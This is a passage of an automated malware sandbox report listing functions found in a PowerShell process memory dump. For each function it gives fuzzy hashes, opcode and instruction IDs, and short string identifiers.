                                                                • Opcode Fuzzy Hash: 4e087b51e3f1d687f3a34c31a0967ffcc11ea22bedc7905bdd7152ad2127061c
                                                                • Instruction Fuzzy Hash: 63F108B170430EDFDB168E68DA0076ABBA2AF86390F14887AE615CB391DB35D845C771
                                                                Function 077F4CB8 Relevance: 5.3, Strings: 4, Instructions: 275COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1990095072.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_77f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 84!l$84!l$tPkq$tPkq
                                                                • API String ID: 0-3344138037
                                                                • Opcode ID: 8f94c7191fdeb923482338f0cd8c219d6b054d6dd661e649fb7c70eb14b894f5
                                                                • Instruction ID: 16296254ef7ddd03e8a6616f0d5f40ffa682382f58c6ed896b22c9de1e44cb3e
                                                                • Opcode Fuzzy Hash: 8f94c7191fdeb923482338f0cd8c219d6b054d6dd661e649fb7c70eb14b894f5
                                                                • Instruction Fuzzy Hash: DE913DB17002869FCB249E69CA50B7BBBE2AFC5350F28C86ADA45DF395CA35DC40C751
                                                                Function 077F00F0 Relevance: 5.2, Strings: 4, Instructions: 242COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1990095072.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_77f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'kq$4'kq$XY#l$XY#l
                                                                • API String ID: 0-4060309308
                                                                • Opcode ID: d9e65deb037e0e48b5228f64e4939c853b72ec06deb7af535caf940a3188a22d
                                                                • Instruction ID: 667f10070551a01440aa0b916386fba1eb138673d9203b5471194fa18484f3c9
                                                                • Opcode Fuzzy Hash: d9e65deb037e0e48b5228f64e4939c853b72ec06deb7af535caf940a3188a22d
                                                                • Instruction Fuzzy Hash: F4815AB170534A8FCB218B789A0066ABFA2AFC6250F24C8BBD645CB353D631C845C7A1
                                                                Function 077F81E8 Relevance: 5.2, Strings: 4, Instructions: 192COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1990095072.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_77f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (f#l$(f#l$(f#l$(f#l
                                                                • API String ID: 0-2541482469
                                                                • Opcode ID: a3cd7296e552e15da3fa0af61cfb53cf61065e16f06ab0b5dc4555d45598ee18
                                                                • Instruction ID: c533881bb077de5c234ed21f1e97c6b0e77e522e0be5ef8b9c2bd02d7dd98bad
                                                                • Opcode Fuzzy Hash: a3cd7296e552e15da3fa0af61cfb53cf61065e16f06ab0b5dc4555d45598ee18
                                                                • Instruction Fuzzy Hash: C8718DB0A00209DFDB14CF58CA51A6EBBB2BF89350F148569D914AB365CB32EC45CB92
                                                                Function 077FEA0A Relevance: 5.2, Strings: 4, Instructions: 172COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1990095072.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_77f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (f#l$(f#l$4'kq$4 l
                                                                • API String ID: 0-2645944089
                                                                • Opcode ID: 7bb42d78c72f713cb3db61070bd9aaf248da9c5330c63e4753f7b51815b5a431
                                                                • Instruction ID: fd811044b2847bfcfd43565fba643e43a23539f3eaac33649c443d0d02efe1a2
                                                                • Opcode Fuzzy Hash: 7bb42d78c72f713cb3db61070bd9aaf248da9c5330c63e4753f7b51815b5a431
                                                                • Instruction Fuzzy Hash: 2F6192F0A01305DFCB14CF58C655E6ABBB2BF86350F188569EA05AB365CB72E841CB91
                                                                Function 077F1070 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1990095072.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_77f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $kq$$kq$$kq$$kq
                                                                • API String ID: 0-2881790790
                                                                • Opcode ID: fd144964635e1e31cd2bda2a8840bfff89e946505262fc9d2ea8d30dcc90be49
                                                                • Instruction ID: ba86a7d51d03b62357c8cb6eff1d396eeb384e839e5ccc0dc0efb34c19dea229
                                                                • Opcode Fuzzy Hash: fd144964635e1e31cd2bda2a8840bfff89e946505262fc9d2ea8d30dcc90be49
                                                                • Instruction Fuzzy Hash: 152147B172024EDBDB34957A9E00B27A7DA9BC0395FB48C2AA605CB381DD3AC8418361
                                                                Function 077F1CC1 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1990095072.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_77f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'kq$4'kq$$kq$$kq
                                                                • API String ID: 0-1727931526
                                                                • Opcode ID: 5c8ce61fbd14c343861d14c53691d04eae3374d75d14b2a06c06a16669b7ad77
                                                                • Instruction ID: e201ab55577a8c10cf74ef78e48e22430f580dbfe85d5287cacf4f2146558cd0
                                                                • Opcode Fuzzy Hash: 5c8ce61fbd14c343861d14c53691d04eae3374d75d14b2a06c06a16669b7ad77
                                                                • Instruction Fuzzy Hash: B801756160A3DA9FC73A172858202666FB25FD3550B3905EBC584DB397CD198C1683A6